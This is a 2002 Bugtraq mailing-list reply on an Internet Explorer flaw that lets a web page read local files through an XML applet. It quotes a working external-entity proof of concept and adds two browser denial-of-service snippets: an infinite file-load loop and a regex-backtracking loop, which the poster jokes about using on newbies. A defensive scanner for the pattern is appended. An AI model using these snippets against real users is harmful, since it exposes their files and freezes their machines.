Re: Internet explorer can read local files

Thanks to IE's LiveConnect features the whole applet should be fully
scriptable. Decompiling the applet revealed that there is a public
load(String name) function, so you can probably get something like this
to work:

while (true) {
    xmldso.load('myexefile.exe');
}


Here's another code snippet that does what you describe. It served me well
in the past to get rid of newbies asking how to convert a string to an
integer *grin*

<script language="javascript">

 while (true) {
  try {

   pattern = new RegExp("(a?)b(\\1{2})+c","g");
   text = "bc";
   match = pattern.test(text);

  } catch(exception) {

  }
 }

</script>



----- Original Message -----
From: "Avleen Vig" <lists-bugtraq@silverwraith.com>
To: "Jelmer" <jelmer@kuperus.xs4all.nl>
Cc: <bugtraq@securityfocus.com>
Sent: Saturday, August 17, 2002 8:31 PM
Subject: Re: Internet explorer can read local files


> On Sat, 17 Aug 2002, Jelmer wrote:
>
> > <html>
> > <head>
> >  <base href="file:///C:/">
> > </head>
> > <body>
> >  <applet code="com.ms.xml.dso.XMLDSO.class" width="0" height="0" id="xmldso"
> > MAYSCRIPT="true">
> >   <?xml version="1.0"?>
> >   <!DOCTYPE file  [
> >     <!ELEMENT file (#PCDATA) >
> >     <!ENTITY contents SYSTEM "file:///C:/jelmer.txt">
> >   ]>
> >   <file>
> >   &contents;
> >   </file>
> >  </applet>
> >  <script language="javascript">
> >   setTimeout("showIt()",2000);
> >   function showIt() {
> >    var jelmer = xmldso.getDocument();
> >    alert(jelmer.Text);
> >   }
> >  </script>
> > </body>
> > </html>
>
> This is also a short term 100% CPU consumption vulnerability:
> replace 'file:///C:/jelmer.txt' with the location of any executable file,
> and IE will consume 100% CPU for approximately 30 seconds. During this
> time, task manager (on Win2k SP2 at least) cannot start.
> Closing the IE window does not fix the problem.
> If it were possible to make the script not time out, this would be a
> bigger problem. There's also nothing to stop you spawning off other
> windows and such to increase the length of time the user is affected.
>
>
>
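
A defensive check for the pattern in the quoted page, as an added example that is not part of the original thread: it flags a file: base href and any external entity declared inside an applet body, for use in a content filter or page audit. The function names and the regex heuristics are assumptions made for this example.

```javascript
'use strict';
// Heuristic regex scan (not a full HTML/XML parser) for the two markers in
// the quoted page: a file: <base href> and an external entity in an <applet>.
const ENTITY_RE = /<!ENTITY\s+(?:%\s+)?([^\s>]+)\s+(?:SYSTEM|PUBLIC\s+(?:"[^"]*"|'[^']*'))\s+(?:"([^"]*)"|'([^']*)')/gi;
const BASE_RE = /<base\b[^>]*\bhref\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;
const APPLET_RE = /<applet\b([^>]*)>([\s\S]*?)<\/applet\s*>/gi;

// Local means a file: URL, a drive-letter path, or a UNC path.
function isLocalUri(uri) {
  const u = uri.trim();
  return /^file:/i.test(u) || /^[a-z]:[\\/]/i.test(u) || u.startsWith('\\\\');
}

// Returns one finding per local base href and per external entity declaration.
function scanPage(html) {
  const findings = [];
  for (const m of html.matchAll(BASE_RE)) {
    const href = m[1] ?? m[2] ?? m[3];
    if (isLocalUri(href)) findings.push({ kind: 'base-href-local', value: href });
  }
  for (const a of html.matchAll(APPLET_RE)) {
    const xmldso = /com\.ms\.xml\.dso\.XMLDSO/i.test(a[1]);
    for (const e of a[2].matchAll(ENTITY_RE)) {
      const uri = e[2] ?? e[3];
      const kind = isLocalUri(uri) ? 'external-entity-local' : 'external-entity-remote';
      findings.push({ kind, entity: e[1], value: uri, xmldso });
    }
  }
  return findings;
}

// Constructed sample, reduced from the page quoted in this thread.
const SAMPLE = `<html><head><base href="file:///C:/"></head><body>
<applet code="com.ms.xml.dso.XMLDSO.class" width="0" height="0" id="xmldso" MAYSCRIPT="true">
<?xml version="1.0"?>
<!DOCTYPE file [
  <!ELEMENT file (#PCDATA) >
  <!ENTITY contents SYSTEM "file:///C:/jelmer.txt">
]>
<file>&contents;</file>
</applet></body></html>`;

// Constructed benign page: https base, internal entity only.
const BENIGN = `<base href="https://example.com/">
<applet code="Demo.class"><!DOCTYPE d [ <!ENTITY greeting "hello"> ]><d>&greeting;</d></applet>`;

for (const f of scanPage(SAMPLE)) console.log(f.kind, f.value);
```

An internal entity such as the one in BENIGN produces no finding; only declarations with a SYSTEM or PUBLIC identifier are reported.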


